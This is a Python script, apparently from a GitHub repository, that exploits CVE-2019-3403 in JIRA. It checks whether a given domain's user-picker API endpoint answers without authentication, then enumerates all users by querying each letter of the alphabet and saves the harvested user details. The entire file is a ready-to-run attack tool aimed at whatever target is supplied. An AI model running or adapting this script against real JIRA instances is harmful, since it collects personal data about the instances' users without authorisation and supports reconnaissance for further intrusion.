# README.md
# Rendering markdown...
# (The two lines above are stray extraction artifacts, commented out so the
#  file remains valid Python.)
import requests
from bs4 import BeautifulSoup
import json
import argparse
from functools import reduce
def scrape_jira(target, query, verbose):
    """Query the vulnerable JIRA user-picker endpoint and return user entries.

    Args:
        target: Full URL of the ``/rest/api/2/user/picker`` endpoint.
        query: Dict of query-string parameters, e.g.
            ``{'query': 'a', 'maxResults': 1000}``.
        verbose: When True, print how many users the request returned.

    Returns:
        List of user strings with their HTML markup stripped.
    """
    r = requests.get(target, params=query)
    # A patched instance (or odd response) may omit the 'users' key; fall
    # back to an empty list instead of iterating over None.
    users = r.json().get('users') or []
    # Each entry's 'html' field contains markup around the user info;
    # BeautifulSoup strips it down to plain text.
    cleaned_info = [
        BeautifulSoup(user.get('html'), 'html.parser').get_text()
        for user in users
    ]
    if verbose:
        print(f'[*] Retrieved {len(users)} users for query: {query}')
    return cleaned_info
def unique(input_list):
    """Return *input_list* with duplicates removed, preserving first-seen order.

    Args:
        input_list: Iterable of hashable items (here: user strings).

    Returns:
        A new list containing each item once, in original order.
    """
    # dict preserves insertion order (Python 3.7+), so dict.fromkeys gives
    # O(n) de-duplication versus the original O(n^2) membership-test loop.
    return list(dict.fromkeys(input_list))
# ---- CLI arguments -------------------------------------------------------
parser = argparse.ArgumentParser(description='Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]')
parser.add_argument('-d', '--domain', help='The domain of the target', required=True, type=str)
parser.add_argument('-q', '--query', help='Specific query to run against the API', default='', type=str)
parser.add_argument('-o', '--out', help='Output to a file', default='', type=str)
parser.add_argument('-v', '--verbose', help='Verbose output', action="store_true")
args = parser.parse_args()

target = f'https://{args.domain}/rest/api/2/user/picker'
query = {'query': args.query, 'maxResults': 1000}

# Test to see if the target is vulnerable: an unauthenticated 200 from the
# user picker endpoint means the instance leaks user data (CVE-2019-3403).
print(f'[*] Testing if {args.domain} is vulnerable')
resp = requests.get(target, params=query)
if resp.status_code != 200:
    print(f'[-] {args.domain} is not vulnerable.')
    exit(0)
print(f'[+] {args.domain} is vulnerable!')

# If there is a user defined query, run just that one search.
if args.query:
    print(f'[*] Requesting user-supplied query: {args.query}')
    cleaned = scrape_jira(target, query, args.verbose)
# Otherwise scrape everything.
else:
    print(f'[*] No user-supplied query... scraping everything')
    # This scraping method is really stupid and I hate it...
    # but it works. You just search once for each letter of the alphabet.
    scrape_set = [chr(i) for i in range(65, 91)]  # 'A'..'Z'
    per_letter = [
        scrape_jira(target, {'query': search, 'maxResults': 1000}, args.verbose)
        for search in scrape_set
    ]
    # Flatten the list of per-letter lists. The [] initial value keeps
    # reduce from raising TypeError if per_letter were ever empty.
    cleaned = reduce(list.__add__, per_letter, [])

final = unique(cleaned)
print(f'[*] Scraped {len(final)} users from JIRA.')

# Output: optionally to a file, always to stdout.
if args.out:
    with open(args.out, 'w') as f:
        for user in final:
            f.write(f'{user}\n')
for user in final:
    print(f'[+] User: {user}')